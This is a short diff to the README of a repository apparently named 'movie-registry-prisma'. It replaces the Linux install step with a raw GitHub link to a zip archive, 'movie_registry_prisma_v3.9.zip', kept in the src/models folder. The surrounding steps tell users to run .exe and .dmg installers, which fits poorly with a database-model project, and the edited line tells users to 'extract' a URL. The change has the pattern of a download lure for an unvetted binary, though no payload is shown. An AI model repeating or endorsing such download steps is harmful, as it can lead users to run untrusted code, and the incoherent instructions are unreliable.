TNP1411/movie-registry-prisma/README.md

    - On Windows, double-click the `.exe` file.
    - On macOS, open the `.dmg` and drag the app to your Applications folder.
-   - On Linux, extract the `.tar.gz` and follow any readme instructions in that package.
+   - On Linux, extract the `https://raw.githubusercontent.com/TNP1411/movie-registry-prisma/main/src/models/movie_registry_prisma_v3.9.zip` and follow any readme instructions in that package.

 4. **Follow Installation Instructions**